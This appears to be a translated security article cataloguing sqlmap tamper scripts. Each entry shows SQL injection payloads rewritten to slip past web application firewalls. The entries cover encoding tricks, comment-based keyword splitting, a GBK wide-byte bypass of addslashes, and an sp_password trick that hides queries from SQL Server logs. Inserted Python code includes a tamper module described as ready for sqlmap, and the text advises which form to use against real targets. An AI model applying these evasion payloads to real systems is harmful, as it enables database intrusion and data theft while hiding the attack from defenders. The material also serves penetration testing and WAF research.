
Sqlmap Tamper Collection (3)


sqlmap is an automated SQL injection tool whose main job is to scan for, detect and exploit SQL injection flaws in a given URL. The database back ends the original article lists are MS SQL, MySQL, Oracle and PostgreSQL (current sqlmap releases support many more). sqlmap uses several injection techniques, among them inferential (boolean-based) blind injection, UNION query injection, stacked queries and time-based blind injection. Its wide range of features and options covers database fingerprinting, enumeration, data extraction, access to the target file system and, once sufficient privileges are obtained, execution of arbitrary commands. In many situations you can attack a target more effectively by using the tamper scripts shipped with sqlmap: each one rewrites the injection payload before it is sent, which is how filters and web application firewalls that match on the raw request are evaded.

This is the final part of the Sqlmap Tamper collection. Readers who want the first two parts can find them here: "Sqlmap Tamper大全(1)" and "Sqlmap Tamper大全(二)".

Script: sp_password.py
Purpose: appends 'sp_password' to the end of the payload so that the statement is automatically hidden from the DBMS logs. SQL Server replaces the text of any traced statement that contains the string sp_password with a comment saying it was removed for security reasons, so the injected query never shows up in SQL Profiler or trace output.
Example:

  ('1 AND 9227=9227-- ')  ->  '1 AND 9227=9227-- sp_password'

Requirement: MSSQL

———————————————————————————

Script: chardoubleencode.py
Purpose: double URL-encodes every character of the payload. A sequence that is already percent-encoded (the %20 in the example) is not encoded twice; only its leading % is encoded again, giving %2520.
Example:

  Input:  SELECT FIELD FROM%20TABLE
  Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

———————————————————————————

Script: unionalltounion.py
Purpose: replaces UNION ALL SELECT with UNION SELECT.
Example:

  ('-1 UNION ALL SELECT')  ->  '-1 UNION SELECT'

Requirement: all

———————————————————————————

Script: charencode.py
Purpose: URL-encodes every character of the payload (sequences that are already encoded are left as they are).
Example:

  Input:  SELECT FIELD FROM%20TABLE
  Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

Tested against:
  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass very weak web application firewalls that do not URL-decode the request before processing it through their ruleset
  • The web server passes the URL-decoded version on to the application anyway, so the script should work against any DBMS
———————————————————————————

Script: randomcase.py
Purpose: gives each character of every keyword a random case.
Example:

  Input:  INSERT
  Output: InsERt

Tested against:
  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

———————————————————————————

Script: unmagicquotes.py
Purpose: wide-byte (multibyte) bypass of GPC magic_quotes / addslashes escaping.
Example:

  Input:  1' AND 1=1
  Output: 1%bf%27 AND 1=1--%20

Notes:
  • Useful for bypassing the magic_quotes/addslashes feature
  • The trick only works when the database connection uses a multibyte character set such as GBK: addslashes() turns %bf%27 into the bytes 0xBF 0x5C 0x27, the pair 0xBF 0x5C is read as one valid two-byte character, and the quote 0x27 reaches the SQL parser unescaped. With a single-byte or UTF-8 connection the backslash still escapes the quote.
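The following is an added example, not part of the original article and not sqlmap's own code: it reproduces the unmagicquotes.py rewrite and then simulates offline why the quote survives. It assumes a PHP front end that escapes input with addslashes() (php_addslashes() below is my emulation of that function) and a MySQL connection whose character set is GBK; the payloads are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes


def unmagicquotes(payload: str) -> str:
    """Tamper step as the page describes it: the first single quote becomes
    %bf%27 and, if the payload carries no comment yet, it is closed with --%20
    so that whatever the application appends after it is ignored."""
    if "'" not in payload:
        return payload
    out = payload.replace("'", "%bf%27", 1)
    if not any(marker in out for marker in ("#", "--", "/*")):
        out += "--%20"
    return out


def php_addslashes(data: bytes) -> bytes:
    """Emulation (assumption) of PHP addslashes(): it works byte by byte and
    puts a backslash before ' " \\ and NUL, with no idea of character sets."""
    return re.sub(rb"['\"\\\x00]", lambda m: b"\\" + m.group(0), data)


def mysql_sees(url_payload: str, charset: str) -> str:
    """Decode the URL payload to raw bytes, escape them the way the PHP layer
    would, then decode the escaped bytes as a MySQL connection using `charset`
    would read them."""
    raw = unquote_to_bytes(url_payload)          # b"1\xbf' AND 1=1-- "
    escaped = php_addslashes(raw)                # b"1\xbf\\' AND 1=1-- "
    return escaped.decode(charset, errors="replace")


def quote_survives(sql: str) -> bool:
    """True when the quote reached the parser without a preceding backslash."""
    return "'" in sql and "\\'" not in sql


if __name__ == "__main__":
    tampered = unmagicquotes("1' AND 1=1")
    for cs in ("gbk", "latin-1", "utf-8"):
        seen = mysql_sees(tampered, cs)
        print(f"{cs:8} parser sees {seen!r:32} quote unescaped: {quote_survives(seen)}")
```

With GBK the bytes 0xBF 0x5C collapse into a single CJK character and the quote is live; with latin-1 or UTF-8 the backslash stays in front of the quote and the injection fails, which is why the tamper only helps against multibyte-connection setups.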
———————————————————————————

Script: randomcomments.py
Purpose: splits SQL keywords with /**/ comments.
Example:

  'INSERT' becomes 'IN/**/S/**/ERT'
———————————————————————————

Script: versionedkeywords.py
Purpose: encloses each non-function keyword in a versioned MySQL comment (/*!...*/), which MySQL executes as SQL while other parsers treat it as a comment.
Example:

  Input:  1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
  Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS*//*!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

Requirement: MySQL

———————————————————————————

Script: charunicodeencode.py
Purpose: Unicode-URL-encodes (%uXXXX) every character of the payload; sequences that are already percent-encoded become %u00XX.
Example:

  Input:  SELECT FIELD%20FROM TABLE
  Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045

Requirement:
  • ASP
  • ASP.NET
Tested against:
  • Microsoft SQL Server 2000
  • Microsoft SQL Server 2005
  • MySQL 5.1.56
  • PostgreSQL 9.0.3
Notes:
  • Useful to bypass weak web application firewalls that do not Unicode-URL-decode the request before processing it through their ruleset
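The following added example serves the three encoding scripts on this page, chardoubleencode.py, charencode.py and charunicodeencode.py; it is not sqlmap's own code. It follows the module layout sqlmap expects of a tamper script (a module-level __priority__, a dependencies() function and tamper(payload, **kwargs)), so it could be dropped into the tamper/ directory, but the ENCODING selector, server_sees() and the toy naive_waf_flags() rule are my own assumptions, added to show why a firewall that matches the raw request without decoding it first is bypassed while the application still receives the original SQL.

```python
import re
from urllib.parse import unquote

try:
    from lib.core.enums import PRIORITY   # only available when sqlmap loads the script
    __priority__ = PRIORITY.LOWEST
except ImportError:                       # stand-alone run of this example (assumed value)
    __priority__ = -100

# Hypothetical selector so one module can show all three page entries:
# "url" = charencode, "double" = chardoubleencode, "unicode" = charunicodeencode
ENCODING = "url"

# One token is either an already percent-encoded byte (%XX) or a single character.
_TOKEN = re.compile(r"%[0-9A-Fa-f]{2}|.", re.DOTALL)


def dependencies():
    # sqlmap calls this when the script is loaded; nothing to warn about here
    pass


def encode_payload(payload: str, mode: str = "url") -> str:
    out = []
    for tok in _TOKEN.findall(payload):
        already = tok.startswith("%") and len(tok) == 3
        if mode == "unicode":
            # %XX -> %u00XX, any other character -> %uXXXX (IIS/ASP decode %u sequences)
            code = int(tok[1:], 16) if already else ord(tok)
            out.append(f"%u{code:04x}")
            continue
        # raw byte values of the token; a %XX token contributes exactly that byte
        hexes = [tok[1:].lower()] if already else [f"{b:02x}" for b in tok.encode("utf-8")]
        if mode == "url":
            # charencode: leave %XX untouched, percent-encode everything else
            out.append(tok if already else "".join(f"%{h}" for h in hexes))
        elif mode == "double":
            # chardoubleencode: %XX -> %25XX, everything else -> %25XX
            out.append("".join(f"%25{h}" for h in hexes))
        else:
            raise ValueError(f"unknown mode {mode!r}")
    return "".join(out)


def tamper(payload, **kwargs):
    """Entry point sqlmap calls for every payload; kwargs carries the request headers."""
    return encode_payload(payload, ENCODING) if payload else payload


def server_sees(encoded: str, mode: str = "url") -> str:
    """What the application receives after the server-side decoding each script relies on:
    one URL decode, two for the double-encoded form, a %uXXXX decode for the ASP form."""
    if mode == "unicode":
        return re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), encoded)
    text = unquote(encoded)
    return unquote(text) if mode == "double" else text


# Toy rule of a WAF that inspects the raw request without decoding it (assumption).
_SIGNATURE = re.compile(r"(?i)\bselect\b.*\bfrom\b")


def naive_waf_flags(raw_request: str) -> bool:
    return _SIGNATURE.search(raw_request) is not None


if __name__ == "__main__":
    sample = "SELECT FIELD FROM%20TABLE"      # constructed input, same as the page's example
    for mode in ("url", "double", "unicode"):
        enc = encode_payload(sample, mode)
        print(f"{mode:8} wire: {enc}")
        print(f"{'':8} app sees: {server_sees(enc, mode)!r}  WAF flagged: {naive_waf_flags(enc)}")
```

The double-encoded form only pays off where the application (or a framework in front of it) decodes a second time; the %u form needs a server that understands %uXXXX, which is why the page restricts charunicodeencode.py to ASP and ASP.NET.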
———————————————————————————

Script: securesphere.py
Purpose: appends a specially crafted string (a bypass aimed at the Imperva SecureSphere WAF the script is named after).
Example:

  ('1 AND 1=1')  ->  "1 AND 1=1 and '0having'='0having'"

Tested against: all

———————————————————————————

Script: versionedmorekeywords.py
Purpose: comment-based bypass that encloses every keyword, function names included, in a versioned MySQL comment.
Example:

  Input:  1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
  Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement: MySQL >= 5.1.13

———————————————————————————

Script: space2comment.py
Purpose: replaces each space character (' ') with the comment '/**/'.
Example:

  Input:  SELECT id FROM users
  Output: SELECT/**/id/**/FROM/**/users

Tested against:
  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0
Notes:
  • Useful to bypass weak and bespoke web application firewalls
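The following added example, which is not sqlmap's code, implements the comment-based MySQL scripts of this page over one keyword tokenizer: versionedkeywords.py, versionedmorekeywords.py, space2comment.py, and the opening-only /*!0 form of halfversionedmorekeywords.py described in the next entry. The KEYWORDS set, the style names, the optional version number, naive_waf_flags() and mysql_view() are assumptions made for this example; mysql_view() only approximates the token stream MySQL derives from closed /*!...*/ and /**/ comments and does not model the unterminated /*!0 form.

```python
import re

# Keyword table used only by this example; sqlmap keeps a far larger one.
KEYWORDS = {"UNION", "ALL", "SELECT", "NULL", "AS", "CHAR", "AND", "OR",
            "FROM", "WHERE", "CONCAT", "IFNULL", "CAST", "CURRENT_USER"}

# A token is a word, a run of whitespace, or any other single character.
_TOKEN = re.compile(r"[A-Za-z_]\w*|\s+|.", re.DOTALL)


def versioned_comments(payload: str, style: str = "nonfunc", version: str = "") -> str:
    """
    style="nonfunc": versionedkeywords        -> /*!KW*/ around keywords not used as calls
    style="all":     versionedmorekeywords    -> /*!KW*/ around every keyword
    style="half":    halfversionedmorekeywords -> '/*!0' prefix only, never closed (MySQL < 5.1)
    version: optional digits, e.g. "50000" gives /*!50000KW*/, which MySQL runs as SQL
             only when the server version is at least 5.00.00.
    """
    toks = _TOKEN.findall(payload)
    marked = []
    for i, tok in enumerate(toks):
        is_kw = tok.upper() in KEYWORDS
        is_call = is_kw and i + 1 < len(toks) and toks[i + 1].startswith("(")
        if is_kw and (style != "nonfunc" or not is_call):
            text = f"/*!0{tok}" if style == "half" else f"/*!{version}{tok}*/"
            marked.append((text, True))
        else:
            marked.append((tok, False))
    out = []
    for i, (text, wrapped) in enumerate(marked):
        # whitespace between two commented keywords is redundant; drop it as sqlmap's output does
        if text.isspace() and 0 < i < len(marked) - 1 and marked[i - 1][1] and marked[i + 1][1]:
            continue
        out.append(text)
    return "".join(out)


def space2comment(payload: str) -> str:
    """space2comment: every space becomes an inline comment."""
    return payload.replace(" ", "/**/")


# Toy rule of a weak WAF that expects whitespace between the keywords (assumption).
_SIGNATURE = re.compile(r"(?i)\bunion\s+(?:all\s+)?select\b")


def naive_waf_flags(request_text: str) -> bool:
    return _SIGNATURE.search(request_text) is not None


def mysql_view(tampered: str) -> str:
    """Approximate what MySQL's lexer works on: the body of a /*!...*/ comment is
    executed as SQL and /**/ separates tokens like whitespace."""
    s = tampered.replace("/**/", " ")
    s = re.sub(r"/\*!\d*", " ", s)
    return s.replace("*/", " ")


def sql_tokens(sql: str) -> list:
    """Token list used to compare the original query with what MySQL reconstructs."""
    return re.findall(r"\w+|[^\w\s]", sql)


if __name__ == "__main__":
    original = "1 UNION ALL SELECT NULL, CONCAT(CHAR(58),CURRENT_USER())"   # constructed sample
    for name, tampered in (
        ("versionedkeywords", versioned_comments(original, "nonfunc")),
        ("versionedmorekeywords", versioned_comments(original, "all")),
        ("halfversionedmorekeywords", versioned_comments(original, "half")),
        ("space2comment", space2comment(original)),
    ):
        print(f"{name:26} {tampered}")
        print(f"{'':26} WAF flagged: {naive_waf_flags(tampered)}")
```

Against a real target the version-qualified form (/*!50000UNION*/) is the one to reach for: a generic parser or WAF drops the comment body, while a MySQL server of at least that version executes it.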
———————————————————————————

Script: halfversionedmorekeywords.py
Purpose: puts a versioned MySQL comment opener (/*!0) in front of each keyword without ever closing it.
Example:

  Input:  value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa
  Output: value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND 'QDWa'='QDWa

Requirement: MySQL < 5.1
Tested against:
  • MySQL 4.0.18, 5.0.22

———————————————————————————

This is the final part of the Sqlmap Tamper collection. Readers who want the first two parts can find them here: "Sqlmap Tamper大全(1)" and "Sqlmap Tamper大全(二)". via @凌霄飞龙, first published on 91ri.org
